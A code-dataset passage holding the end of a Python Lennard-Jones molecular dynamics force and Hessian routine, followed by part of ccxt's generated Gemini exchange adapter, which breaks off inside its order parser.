j-cell==i-cell and i is last 
atom\n\n for kj in kcj[j0:]: # Loop over individual atoms in j-cell\n rij = r[ki,:]-r[kj,:] # Separation vector\n rij = rij - np.rint(rij) # Periodic boundary conditions in box=1 units\n rij_sq = np.sum(rij**2) # Squared separation\n\n if rij_sq < r_cut_box_sq: # Check within cutoff\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = 1.0 / rij_sq # (sigma/rij)**2\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n cut = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = cut + sr12 # LJ virial\n pot = cut - pot_cut # LJ potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = rij * vir * sr2 # LJ forces\n total = total + PotentialType ( cut=cut, pot=pot, vir=vir, lap=lap, ovr=ovr )\n f[ki,:] = f[ki,:] + fij\n f[kj,:] = f[kj,:] - fij\n\n # Multiply results by numerical factors\n f = f * 24.0 # 24*epsilon\n total.cut = total.cut * 4.0 # 4*epsilon\n total.pot = total.pot * 4.0 # 4*epsilon\n total.vir = total.vir * 24.0 / 3.0 # 24*epsilon and divide virial by 3\n total.lap = total.lap * 24.0 * 2.0 # 24*epsilon and factor 2 for ij and ji\n \n return total, f\n\n\ndef hessian ( box, r_cut, r, f ):\n \"\"\"Calculates Hessian function (for 1/N correction to config temp).\"\"\"\n\n import numpy as np\n from itertools import product\n import math\n\n # This routine is only needed in a constant-energy ensemble\n # It is assumed that positions are in units where box = 1\n # but the result is given in units where sigma = 1 and epsilon = 1\n # It is assumed that forces have already been calculated in array f\n # Uses neighbour lists\n\n n = r.shape[0]\n assert np.all ( r.shape==f.shape ), 'Dimension mismatch in hessian'\n\n # Set up vectors to half the cells in neighbourhood of 3x3x3 cells in cubic lattice\n # The cells are chosen so that if (d1,d2,d3) appears, then (-d1,-d2,-d3) does not.\n d = np.array ( [ [ 0, 0, 0], [ 1, 0, 0], [ 1, 1, 0], [-1, 1, 0],\n [ 0, 1, 0], [ 0, 0, 1], [-1, 0, 1], [ 1, 0, 1], [-1,-1, 1],\n [ 0,-1, 1], [ 1,-1, 1], [-1, 1, 1], [ 0, 1, 1], [ 1, 1, 1] ] )\n\n r = r - np.rint(r) # Ensure all atoms in periodic box\n\n r_cut_box = r_cut / box\n r_cut_box_sq = r_cut_box ** 2\n box_sq = box ** 2\n\n hes = 0.0\n\n # Calculate cell index triplets\n sc = math.floor(box/r_cut) # Number of cells along box edge\n c = np.floor((r+0.5)*sc).astype(np.int_) # N*3 array of cell indices for all atoms\n assert np.all(c>=0) and np.all(c<sc), 'Index error' # Simplistic \"guard\" against roundoff\n\n if fast:\n \n # Build list of arrays, each array holding positions of atoms in a cell\n # At the same time, build a matching set of force arrays in each cell\n # i and j number the atoms in each cell; we do not refer explicitly to indices in r\n rc, fc = [], [] # Initially empty lists of positions and forces\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n rc.append(r[mask,:]) # Copy atom coordinates into array, add to list\n fc.append(f[mask,:]) # Copy corresponding forces, add to list\n \n for ci1, rci in enumerate(rc): # Loop over i-cells, getting all atoms in each i-cell as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n fci = fc[ci1] # Get i-cell atom forces\n if rci.size==0: # Handle empty cell\n continue\n\n for dj in d: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # 
Convert j-cell to single-index\n rcj = rc[cj1] # Get atoms in j-cell as an array\n fcj = fc[cj1] # Get j-cell atom forces\n if rcj.size==0: # Handle empty cell\n continue\n\n rij = rci[:,np.newaxis,:]-rcj[np.newaxis,:,:] # Separation vectors for all i and j\n rij = rij - np.rint(rij) # PBCs in box=1 units\n rij_sq = np.sum(rij**2,axis=2) # Squared separations\n in_range = rij_sq < r_cut_box_sq # Set flags for within cutoff\n\n if ci1==cj1:\n np.fill_diagonal(in_range,False) # Eliminate i=j when i-cell is j-cell\n np.fill_diagonal(rij_sq,1.0) # Avoid divide-by-zero below\n\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n fij = fci[:,np.newaxis,:]-fcj[np.newaxis,:,:] # Differences in forces for all i and j\n\n ff = np.sum(fij*fij,axis=2)\n rf = np.sum(rij*fij,axis=2)\n sr2 = np.where ( in_range, 1.0 / rij_sq, 0.0 ) # Only where in range\n sr6 = sr2 ** 3\n sr8 = sr6 * sr2\n sr10 = sr8 * sr2\n v1 = 24.0 * ( 1.0 - 2.0 * sr6 ) * sr8\n v2 = 96.0 * ( 7.0 * sr6 - 2.0 ) * sr10\n if ci1==cj1: # Correct for double-counting ij and ji\n hes = hes + np.sum(v1 * ff)/2 + np.sum(v2 * rf**2)/2\n else:\n hes = hes + np.sum(v1 * ff) + np.sum(v2 * rf**2)\n\n else:\n \n # Build list of arrays, each array holding indices of atoms in a cell\n # ki and kj are atom indices in the r array; i and j number the atoms in each cell\n k_array = np.arange(n) # Atom indices 0..N-1\n kc = [] # Initially empty list of indices covering each cell\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n kc.append(k_array[mask]) # Copy atom indices into array, add to list\n\n for ci1, kci in enumerate(kc): # Loop over i-cells, getting atom indices as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n\n for dj in d: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert to single-index\n kcj = kc[cj1] # Get indices of atoms in j-cell as an array\n\n for i, ki in enumerate(kci): # Loop over individual atoms in i-cell\n j0 = i+1 if cj1==ci1 else 0 # Only look upwards if i-cell==j-cell\n if j0 >= kcj.size: # Handles (redundantly) empty j-cell and the case \n continue # where j-cell==i-cell and i is last atom\n\n for kj in kcj[j0:]: # Loop over individual atoms in j-cell\n rij = r[ki,:]-r[kj,:] # Separation vector\n rij = rij - np.rint(rij) # Periodic boundary conditions in box=1 units\n rij_sq = np.sum(rij**2) # Squared separation\n\n if rij_sq < r_cut_box_sq:\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n fij = f[ki,:] - f[kj,:] # Difference in forces\n \n ff = np.dot(fij,fij)\n rf = np.dot(rij,fij)\n sr2 = 1.0 / rij_sq\n sr6 = sr2 ** 3\n sr8 = sr6 * sr2\n sr10 = sr8 * sr2\n v1 = 24.0 * ( 1.0 - 2.0 * sr6 ) * sr8\n v2 = 96.0 * ( 7.0 * sr6 - 2.0 ) * sr10\n hes = hes + v1 * ff + v2 * rf**2\n\n return hes\n"} {"ext": "py", "sha": "1a30de7e64cb793b53cfa5d7f193eb6e863803db", "content": "# -*- coding: utf-8 -*-\n\n# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:\n# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code\n\nfrom ccxt.base.exchange import Exchange\n\n# -----------------------------------------------------------------------------\n\ntry:\n basestring # Python 3\nexcept NameError:\n basestring = str # Python 2\nimport hashlib\nfrom ccxt.base.errors import ExchangeError\nfrom 
ccxt.base.errors import AuthenticationError\nfrom ccxt.base.errors import PermissionDenied\nfrom ccxt.base.errors import ArgumentsRequired\nfrom ccxt.base.errors import BadRequest\nfrom ccxt.base.errors import InsufficientFunds\nfrom ccxt.base.errors import InvalidOrder\nfrom ccxt.base.errors import OrderNotFound\nfrom ccxt.base.errors import NotSupported\nfrom ccxt.base.errors import RateLimitExceeded\nfrom ccxt.base.errors import ExchangeNotAvailable\nfrom ccxt.base.errors import OnMaintenance\nfrom ccxt.base.errors import InvalidNonce\nfrom ccxt.base.decimal_to_precision import TICK_SIZE\n\n\nclass gemini(Exchange):\n\n def describe(self):\n return self.deep_extend(super(gemini, self).describe(), {\n 'id': 'gemini',\n 'name': 'Gemini',\n 'countries': ['US'],\n # 600 requests a minute = 10 requests per second => 1000ms / 10 = 100ms between requests(private endpoints)\n # 120 requests a minute = 2 requests per second =>( 1000ms / rateLimit ) / 2 = 5(public endpoints)\n 'rateLimit': 100,\n 'version': 'v1',\n 'has': {\n 'CORS': None,\n 'spot': True,\n 'margin': False,\n 'swap': False,\n 'future': False,\n 'option': False,\n 'addMargin': False,\n 'cancelOrder': True,\n 'createDepositAddress': True,\n 'createMarketOrder': None,\n 'createOrder': True,\n 'createReduceOnlyOrder': False,\n 'fetchBalance': True,\n 'fetchBidsAsks': None,\n 'fetchBorrowRate': False,\n 'fetchBorrowRateHistories': False,\n 'fetchBorrowRateHistory': False,\n 'fetchBorrowRates': False,\n 'fetchBorrowRatesPerSymbol': False,\n 'fetchClosedOrders': None,\n 'fetchDepositAddress': None, # TODO\n 'fetchDepositAddressesByNetwork': True,\n 'fetchDeposits': None,\n 'fetchFundingHistory': False,\n 'fetchFundingRate': False,\n 'fetchFundingRateHistory': False,\n 'fetchFundingRates': False,\n 'fetchIndexOHLCV': False,\n 'fetchIsolatedPositions': False,\n 'fetchLeverage': False,\n 'fetchLeverageTiers': False,\n 'fetchMarkets': True,\n 'fetchMarkOHLCV': False,\n 'fetchMyTrades': True,\n 'fetchOHLCV': True,\n 'fetchOpenOrders': True,\n 'fetchOrder': True,\n 'fetchOrderBook': True,\n 'fetchOrders': None,\n 'fetchPosition': False,\n 'fetchPositions': False,\n 'fetchPositionsRisk': False,\n 'fetchPremiumIndexOHLCV': False,\n 'fetchTicker': True,\n 'fetchTickers': True,\n 'fetchTrades': True,\n 'fetchTransactions': True,\n 'fetchWithdrawals': None,\n 'reduceMargin': False,\n 'setLeverage': False,\n 'setMarginMode': False,\n 'setPositionMode': False,\n 'withdraw': True,\n },\n 'urls': {\n 'logo': 'https://user-images.githubusercontent.com/1294454/27816857-ce7be644-6096-11e7-82d6-3c257263229c.jpg',\n 'api': {\n 'public': 'https://api.gemini.com',\n 'private': 'https://api.gemini.com',\n 'web': 'https://docs.gemini.com',\n },\n 'www': 'https://gemini.com/',\n 'doc': [\n 'https://docs.gemini.com/rest-api',\n 'https://docs.sandbox.gemini.com',\n ],\n 'test': {\n 'public': 'https://api.sandbox.gemini.com',\n 'private': 'https://api.sandbox.gemini.com',\n # use the True doc instead of the sandbox doc\n # since they differ in parsing\n # https://github.com/ccxt/ccxt/issues/7874\n # https://github.com/ccxt/ccxt/issues/7894\n 'web': 'https://docs.gemini.com',\n },\n 'fees': [\n 'https://gemini.com/api-fee-schedule',\n 'https://gemini.com/trading-fees',\n 'https://gemini.com/transfer-fees',\n ],\n },\n 'api': {\n 'web': {\n 'get': [\n 'rest-api',\n ],\n },\n 'public': {\n 'get': {\n 'v1/symbols': 5,\n 'v1/symbols/details/{symbol}': 5,\n 'v1/pubticker/{symbol}': 5,\n 'v2/ticker/{symbol}': 5,\n 'v2/candles/{symbol}/{timeframe}': 5,\n 
'v1/trades/{symbol}': 5,\n 'v1/auction/{symbol}': 5,\n 'v1/auction/{symbol}/history': 5,\n 'v1/pricefeed': 5,\n 'v1/book/{symbol}': 5,\n 'v1/earn/rates': 5,\n },\n },\n 'private': {\n 'post': {\n 'v1/order/new': 1,\n 'v1/order/cancel': 1,\n 'v1/wrap/{symbol}': 1,\n 'v1/order/cancel/session': 1,\n 'v1/order/cancel/all': 1,\n 'v1/order/status': 1,\n 'v1/orders': 1,\n 'v1/mytrades': 1,\n 'v1/notionalvolume': 1,\n 'v1/tradevolume': 1,\n 'v1/clearing/new': 1,\n 'v1/clearing/status': 1,\n 'v1/clearing/cancel': 1,\n 'v1/clearing/confirm': 1,\n 'v1/balances': 1,\n 'v1/notionalbalances/{currency}': 1,\n 'v1/transfers': 1,\n 'v1/addresses/{network}': 1,\n 'v1/deposit/{network}/newAddress': 1,\n 'v1/deposit/{currency}/newAddress': 1,\n 'v1/withdraw/{currency}': 1,\n 'v1/account/transfer/{currency}': 1,\n 'v1/payments/addbank': 1,\n 'v1/payments/methods': 1,\n 'v1/payments/sen/withdraw': 1,\n 'v1/balances/earn': 1,\n 'v1/earn/interest': 1,\n 'v1/approvedAddresses/{network}/request': 1,\n 'v1/approvedAddresses/account/{network}': 1,\n 'v1/approvedAddresses/{network}/remove': 1,\n 'v1/account': 1,\n 'v1/account/create': 1,\n 'v1/account/list': 1,\n 'v1/heartbeat': 1,\n },\n },\n },\n 'precisionMode': TICK_SIZE,\n 'fees': {\n 'trading': {\n 'taker': 0.0035,\n 'maker': 0.001,\n },\n },\n 'httpExceptions': {\n '400': BadRequest, # Auction not open or paused, ineligible timing, market not open, or the request was malformed, in the case of a private API request, missing or malformed Gemini private API authentication headers\n '403': PermissionDenied, # The API key is missing the role necessary to access self private API endpoint\n '404': OrderNotFound, # Unknown API entry point or Order not found\n '406': InsufficientFunds, # Insufficient Funds\n '429': RateLimitExceeded, # Rate Limiting was applied\n '500': ExchangeError, # The server encountered an error\n '502': ExchangeNotAvailable, # Technical issues are preventing the request from being satisfied\n '503': OnMaintenance, # The exchange is down for maintenance\n },\n 'timeframes': {\n '1m': '1m',\n '5m': '5m',\n '15m': '15m',\n '30m': '30m',\n '1h': '1hr',\n '6h': '6hr',\n '1d': '1day',\n },\n 'exceptions': {\n 'exact': {\n 'AuctionNotOpen': BadRequest, # Failed to place an auction-only order because there is no current auction open for self symbol\n 'ClientOrderIdTooLong': BadRequest, # The Client Order ID must be under 100 characters\n 'ClientOrderIdMustBeString': BadRequest, # The Client Order ID must be a string\n 'ConflictingOptions': BadRequest, # New orders using a combination of order execution options are not supported\n 'EndpointMismatch': BadRequest, # The request was submitted to an endpoint different than the one in the payload\n 'EndpointNotFound': BadRequest, # No endpoint was specified\n 'IneligibleTiming': BadRequest, # Failed to place an auction order for the current auction on self symbol because the timing is not eligible, new orders may only be placed before the auction begins.\n 'InsufficientFunds': InsufficientFunds, # The order was rejected because of insufficient funds\n 'InvalidJson': BadRequest, # The JSON provided is invalid\n 'InvalidNonce': InvalidNonce, # The nonce was not greater than the previously used nonce, or was not present\n 'InvalidOrderType': InvalidOrder, # An unknown order type was provided\n 'InvalidPrice': InvalidOrder, # For new orders, the price was invalid\n 'InvalidQuantity': InvalidOrder, # A negative or otherwise invalid quantity was specified\n 'InvalidSide': InvalidOrder, # For new orders, and invalid 
side was specified\n 'InvalidSignature': AuthenticationError, # The signature did not match the expected signature\n 'InvalidSymbol': BadRequest, # An invalid symbol was specified\n 'InvalidTimestampInPayload': BadRequest, # The JSON payload contained a timestamp parameter with an unsupported value.\n 'Maintenance': OnMaintenance, # The system is down for maintenance\n 'MarketNotOpen': InvalidOrder, # The order was rejected because the market is not accepting new orders\n 'MissingApikeyHeader': AuthenticationError, # The X-GEMINI-APIKEY header was missing\n 'MissingOrderField': InvalidOrder, # A required order_id field was not specified\n 'MissingRole': AuthenticationError, # The API key used to access self endpoint does not have the required role assigned to it\n 'MissingPayloadHeader': AuthenticationError, # The X-GEMINI-PAYLOAD header was missing\n 'MissingSignatureHeader': AuthenticationError, # The X-GEMINI-SIGNATURE header was missing\n 'NoSSL': AuthenticationError, # You must use HTTPS to access the API\n 'OptionsMustBeArray': BadRequest, # The options parameter must be an array.\n 'OrderNotFound': OrderNotFound, # The order specified was not found\n 'RateLimit': RateLimitExceeded, # Requests were made too frequently. See Rate Limits below.\n 'System': ExchangeError, # We are experiencing technical issues\n 'UnsupportedOption': BadRequest, # This order execution option is not supported.\n },\n 'broad': {\n 'The Gemini Exchange is currently undergoing maintenance.': OnMaintenance, # The Gemini Exchange is currently undergoing maintenance. Please check https://status.gemini.com/ for more information.\n 'We are investigating technical issues with the Gemini Exchange.': ExchangeNotAvailable, # We are investigating technical issues with the Gemini Exchange. 
Please check https://status.gemini.com/ for more information.\n },\n },\n 'options': {\n 'fetchMarketsMethod': 'fetch_markets_from_web',\n 'fetchTickerMethod': 'fetchTickerV1', # fetchTickerV1, fetchTickerV2, fetchTickerV1AndV2\n 'networkIds': {\n 'bitcoin': 'BTC',\n 'ethereum': 'ERC20',\n 'bitcoincash': 'BCH',\n 'litecoin': 'LTC',\n 'zcash': 'ZEC',\n 'filecoin': 'FIL',\n 'dogecoin': 'DOGE',\n 'tezos': 'XTZ',\n },\n 'networks': {\n 'BTC': 'bitcoin',\n 'ERC20': 'ethereum',\n 'BCH': 'bitcoincash',\n 'LTC': 'litecoin',\n 'ZEC': 'zcash',\n 'FIL': 'filecoin',\n 'DOGE': 'dogecoin',\n 'XTZ': 'tezos',\n },\n },\n })\n\n def fetch_markets(self, params={}):\n method = self.safe_value(self.options, 'fetchMarketsMethod', 'fetch_markets_from_api')\n return getattr(self, method)(params)\n\n def fetch_markets_from_web(self, params={}):\n response = self.webGetRestApi(params)\n sections = response.split('<h1 id=\"symbols-and-minimums\">Symbols and minimums</h1>')\n numSections = len(sections)\n error = self.id + ' the ' + self.name + ' API doc HTML markup has changed, breaking the parser of order limits and precision info for ' + self.name + ' markets.'\n if numSections != 2:\n raise NotSupported(error)\n tables = sections[1].split('tbody>')\n numTables = len(tables)\n if numTables < 2:\n raise NotSupported(error)\n rows = tables[1].split(\"\\n<tr>\\n\") # eslint-disable-line quotes\n numRows = len(rows)\n if numRows < 2:\n raise NotSupported(error)\n result = []\n # skip the first element(empty string)\n for i in range(1, numRows):\n row = rows[i]\n cells = row.split(\"</td>\\n\") # eslint-disable-line quotes\n numCells = len(cells)\n if numCells < 5:\n raise NotSupported(error)\n # [\n # '<td>btcusd', # currency\n # '<td>0.00001 BTC(1e-5)', # min order size\n # '<td>0.00000001 BTC(1e-8)', # tick size\n # '<td>0.01 USD', # quote currency price increment\n # '</tr>'\n # ]\n marketId = cells[0].replace('<td>', '')\n # base = self.safe_currency_code(baseId)\n minAmountString = cells[1].replace('<td>', '')\n minAmountParts = minAmountString.split(' ')\n minAmount = self.safe_number(minAmountParts, 0)\n amountPrecisionString = cells[2].replace('<td>', '')\n amountPrecisionParts = amountPrecisionString.split(' ')\n idLength = len(marketId) - 0\n startingIndex = idLength - 3\n quoteId = marketId[startingIndex:idLength]\n quote = self.safe_currency_code(quoteId)\n pricePrecisionString = cells[3].replace('<td>', '')\n pricePrecisionParts = pricePrecisionString.split(' ')\n baseId = marketId.replace(quoteId, '')\n base = self.safe_currency_code(baseId)\n result.append({\n 'id': marketId,\n 'symbol': base + '/' + quote,\n 'base': base,\n 'quote': quote,\n 'settle': None,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'settleId': None,\n 'type': 'spot',\n 'spot': True,\n 'margin': False,\n 'swap': False,\n 'future': False,\n 'option': False,\n 'active': None,\n 'contract': False,\n 'linear': None,\n 'inverse': None,\n 'contractSize': None,\n 'expiry': None,\n 'expiryDatetime': None,\n 'strike': None,\n 'optionType': None,\n 'precision': {\n 'amount': self.safe_number(amountPrecisionParts, 0),\n 'price': self.safe_number(pricePrecisionParts, 0),\n },\n 'limits': {\n 'leverage': {\n 'min': None,\n 'max': None,\n },\n 'amount': {\n 'min': minAmount,\n 'max': None,\n },\n 'price': {\n 'min': None,\n 'max': None,\n },\n 'cost': {\n 'min': None,\n 'max': None,\n },\n },\n 'info': row,\n })\n return result\n\n def fetch_markets_from_api(self, params={}):\n response = self.publicGetV1Symbols(params)\n result = []\n for i in 
range(0, len(response)):\n marketId = response[i]\n market = marketId\n idLength = len(marketId) - 0\n baseId = marketId[0:idLength - 3]\n quoteId = marketId[idLength - 3:idLength]\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n result.append({\n 'id': marketId,\n 'symbol': base + '/' + quote,\n 'base': base,\n 'quote': quote,\n 'settle': None,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'settleId': None,\n 'type': 'spot',\n 'spot': True,\n 'margin': False,\n 'swap': False,\n 'future': False,\n 'option': False,\n 'active': None,\n 'contract': False,\n 'linear': None,\n 'inverse': None,\n 'contractSize': None,\n 'expiry': None,\n 'expiryDatetime': None,\n 'strike': None,\n 'optionType': None,\n 'precision': {\n 'price': None,\n 'amount': None,\n },\n 'limits': {\n 'leverage': {\n 'min': None,\n 'max': None,\n },\n 'amount': {\n 'min': None,\n 'max': None,\n },\n 'price': {\n 'min': None,\n 'max': None,\n },\n 'cost': {\n 'min': None,\n 'max': None,\n },\n },\n 'info': market,\n })\n return result\n\n def fetch_order_book(self, symbol, limit=None, params={}):\n self.load_markets()\n request = {\n 'symbol': self.market_id(symbol),\n }\n if limit is not None:\n request['limit_bids'] = limit\n request['limit_asks'] = limit\n response = self.publicGetV1BookSymbol(self.extend(request, params))\n return self.parse_order_book(response, symbol, None, 'bids', 'asks', 'price', 'amount')\n\n def fetch_ticker_v1(self, symbol, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'symbol': market['id'],\n }\n response = self.publicGetV1PubtickerSymbol(self.extend(request, params))\n #\n # {\n # \"bid\":\"9117.95\",\n # \"ask\":\"9117.96\",\n # \"volume\":{\n # \"BTC\":\"1615.46861748\",\n # \"USD\":\"14727307.57545006088\",\n # \"timestamp\":1594982700000\n # },\n # \"last\":\"9115.23\"\n # }\n #\n return self.parse_ticker(response, market)\n\n def fetch_ticker_v2(self, symbol, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'symbol': market['id'],\n }\n response = self.publicGetV2TickerSymbol(self.extend(request, params))\n #\n # {\n # \"symbol\":\"BTCUSD\",\n # \"open\":\"9080.58\",\n # \"high\":\"9184.53\",\n # \"low\":\"9063.56\",\n # \"close\":\"9116.08\",\n # # Hourly prices descending for past 24 hours\n # \"changes\":[\"9117.33\",\"9105.69\",\"9106.23\",\"9120.35\",\"9098.57\",\"9114.53\",\"9113.55\",\"9128.01\",\"9113.63\",\"9133.49\",\"9133.49\",\"9137.75\",\"9126.73\",\"9103.91\",\"9119.33\",\"9123.04\",\"9124.44\",\"9117.57\",\"9114.22\",\"9102.33\",\"9076.67\",\"9074.72\",\"9074.97\",\"9092.05\"],\n # \"bid\":\"9115.86\",\n # \"ask\":\"9115.87\"\n # }\n #\n return self.parse_ticker(response, market)\n\n def fetch_ticker_v1_and_v2(self, symbol, params={}):\n tickerA = self.fetch_ticker_v1(symbol, params)\n tickerB = self.fetch_ticker_v2(symbol, params)\n return self.deep_extend(tickerA, {\n 'open': tickerB['open'],\n 'high': tickerB['high'],\n 'low': tickerB['low'],\n 'change': tickerB['change'],\n 'percentage': tickerB['percentage'],\n 'average': tickerB['average'],\n 'info': tickerB['info'],\n })\n\n def fetch_ticker(self, symbol, params={}):\n method = self.safe_value(self.options, 'fetchTickerMethod', 'fetchTickerV1')\n return getattr(self, method)(symbol, params)\n\n def parse_ticker(self, ticker, market=None):\n #\n # fetchTickers\n #\n # {\n # \"pair\": \"BATUSD\",\n # \"price\": \"0.20687\",\n # \"percentChange24h\": \"0.0146\"\n # }\n #\n # fetchTickerV1\n #\n # {\n # 
\"bid\":\"9117.95\",\n # \"ask\":\"9117.96\",\n # \"volume\":{\n # \"BTC\":\"1615.46861748\",\n # \"USD\":\"14727307.57545006088\",\n # \"timestamp\":1594982700000\n # },\n # \"last\":\"9115.23\"\n # }\n #\n # fetchTickerV2\n #\n # {\n # \"symbol\":\"BTCUSD\",\n # \"open\":\"9080.58\",\n # \"high\":\"9184.53\",\n # \"low\":\"9063.56\",\n # \"close\":\"9116.08\",\n # # Hourly prices descending for past 24 hours\n # \"changes\":[\"9117.33\",\"9105.69\",\"9106.23\",\"9120.35\",\"9098.57\",\"9114.53\",\"9113.55\",\"9128.01\",\"9113.63\",\"9133.49\",\"9133.49\",\"9137.75\",\"9126.73\",\"9103.91\",\"9119.33\",\"9123.04\",\"9124.44\",\"9117.57\",\"9114.22\",\"9102.33\",\"9076.67\",\"9074.72\",\"9074.97\",\"9092.05\"],\n # \"bid\":\"9115.86\",\n # \"ask\":\"9115.87\"\n # }\n #\n volume = self.safe_value(ticker, 'volume', {})\n timestamp = self.safe_integer(volume, 'timestamp')\n symbol = None\n marketId = self.safe_string_lower(ticker, 'pair')\n baseId = None\n quoteId = None\n base = None\n quote = None\n if marketId is not None:\n if marketId in self.markets_by_id:\n market = self.markets_by_id[marketId]\n else:\n idLength = len(marketId) - 0\n if idLength == 7:\n baseId = marketId[0:4]\n quoteId = marketId[4:7]\n else:\n baseId = marketId[0:3]\n quoteId = marketId[3:6]\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n symbol = base + '/' + quote\n if (symbol is None) and (market is not None):\n symbol = market['symbol']\n baseId = market['baseId'].upper()\n quoteId = market['quoteId'].upper()\n base = market['base']\n quote = market['quote']\n price = self.safe_string(ticker, 'price')\n last = self.safe_string_2(ticker, 'last', 'close', price)\n percentage = self.safe_string(ticker, 'percentChange24h')\n open = self.safe_string(ticker, 'open')\n baseVolume = self.safe_string(volume, baseId)\n quoteVolume = self.safe_string(volume, quoteId)\n return self.safe_ticker({\n 'symbol': symbol,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'high': self.safe_string(ticker, 'high'),\n 'low': self.safe_string(ticker, 'low'),\n 'bid': self.safe_string(ticker, 'bid'),\n 'bidVolume': None,\n 'ask': self.safe_string(ticker, 'ask'),\n 'askVolume': None,\n 'vwap': None,\n 'open': open,\n 'close': last,\n 'last': last,\n 'previousClose': None, # previous day close\n 'change': None,\n 'percentage': percentage,\n 'average': None,\n 'baseVolume': baseVolume,\n 'quoteVolume': quoteVolume,\n 'info': ticker,\n }, market, False)\n\n def fetch_tickers(self, symbols=None, params={}):\n self.load_markets()\n response = self.publicGetV1Pricefeed(params)\n #\n # [\n # {\n # \"pair\": \"BATUSD\",\n # \"price\": \"0.20687\",\n # \"percentChange24h\": \"0.0146\"\n # },\n # {\n # \"pair\": \"LINKETH\",\n # \"price\": \"0.018\",\n # \"percentChange24h\": \"0.0000\"\n # },\n # ]\n #\n return self.parse_tickers(response, symbols)\n\n def parse_trade(self, trade, market=None):\n #\n # public fetchTrades\n #\n # {\n # \"timestamp\":1601617445,\n # \"timestampms\":1601617445144,\n # \"tid\":14122489752,\n # \"price\":\"0.46476\",\n # \"amount\":\"28.407209\",\n # \"exchange\":\"gemini\",\n # \"type\":\"buy\"\n # }\n #\n # private fetchTrades\n #\n # {\n # \"price\":\"3900.00\",\n # \"amount\":\"0.00996\",\n # \"timestamp\":1638891173,\n # \"timestampms\":1638891173518,\n # \"type\":\"Sell\",\n # \"aggressor\":false,\n # \"fee_currency\":\"EUR\",\n # \"fee_amount\":\"0.00\",\n # \"tid\":73621746145,\n # \"order_id\":\"73621746059\",\n # \"exchange\":\"gemini\",\n # 
\"is_auction_fill\":false,\n # \"is_clearing_fill\":false,\n # \"symbol\":\"ETHEUR\",\n # \"client_order_id\":\"1638891171610\"\n # }\n #\n timestamp = self.safe_integer(trade, 'timestampms')\n id = self.safe_string(trade, 'tid')\n orderId = self.safe_string(trade, 'order_id')\n feeCurrencyId = self.safe_string(trade, 'fee_currency')\n feeCurrencyCode = self.safe_currency_code(feeCurrencyId)\n fee = {\n 'cost': self.safe_string(trade, 'fee_amount'),\n 'currency': feeCurrencyCode,\n }\n priceString = self.safe_string(trade, 'price')\n amountString = self.safe_string(trade, 'amount')\n side = self.safe_string_lower(trade, 'type')\n symbol = self.safe_symbol(None, market)\n return self.safe_trade({\n 'id': id,\n 'order': orderId,\n 'info': trade,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'symbol': symbol,\n 'type': None,\n 'side': side,\n 'takerOrMaker': None,\n 'price': priceString,\n 'cost': None,\n 'amount': amountString,\n 'fee': fee,\n }, market)\n\n def fetch_trades(self, symbol, since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'symbol': market['id'],\n }\n response = self.publicGetV1TradesSymbol(self.extend(request, params))\n #\n # [\n # {\n # \"timestamp\":1601617445,\n # \"timestampms\":1601617445144,\n # \"tid\":14122489752,\n # \"price\":\"0.46476\",\n # \"amount\":\"28.407209\",\n # \"exchange\":\"gemini\",\n # \"type\":\"buy\"\n # },\n # ]\n #\n return self.parse_trades(response, market, since, limit)\n\n def parse_balance(self, response):\n result = {'info': response}\n for i in range(0, len(response)):\n balance = response[i]\n currencyId = self.safe_string(balance, 'currency')\n code = self.safe_currency_code(currencyId)\n account = self.account()\n account['free'] = self.safe_string(balance, 'available')\n account['total'] = self.safe_string(balance, 'amount')\n result[code] = account\n return self.safe_balance(result)\n\n def fetch_balance(self, params={}):\n self.load_markets()\n response = self.privatePostV1Balances(params)\n return self.parse_balance(response)\n\n def parse_order(self, order, market=None):\n timestamp = self.safe_integer(order, 'timestampms')\n amount = self.safe_string(order, 'original_amount')\n remaining = self.safe_string(order, 'remaining_amount')\n filled = self.safe_string(order, 'executed_amount')\n status = 'closed'\n if order['is_live']:\n status = 'open'\n if order['is_cancelled']:\n status = 'canceled'\n price = self.safe_string(order, 'price')\n average = self.safe_string(order, 'avg_execution_price')\n type = self.safe_string(order, 'type')\n if type == 'exchange limit':\n type = 'limit'\n elif type == 'market buy' or type == 'market sell':\n type = 'market'\n else:\n type = order['type']\n fee = None\n marketId = self.safe_string(order, 'symbol')\n symbol = self.safe_symbol(marketId, market)\n id = self.safe_string(order, 'order_id')\n side = self.safe_string_lower(order, 'side')\n clientOrderId = self.safe_string(order, 'client_order_id')\n return self.safe_order({\n 'id': id,\n 'clientOrderId': clientOrderId,\n 'info': order,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 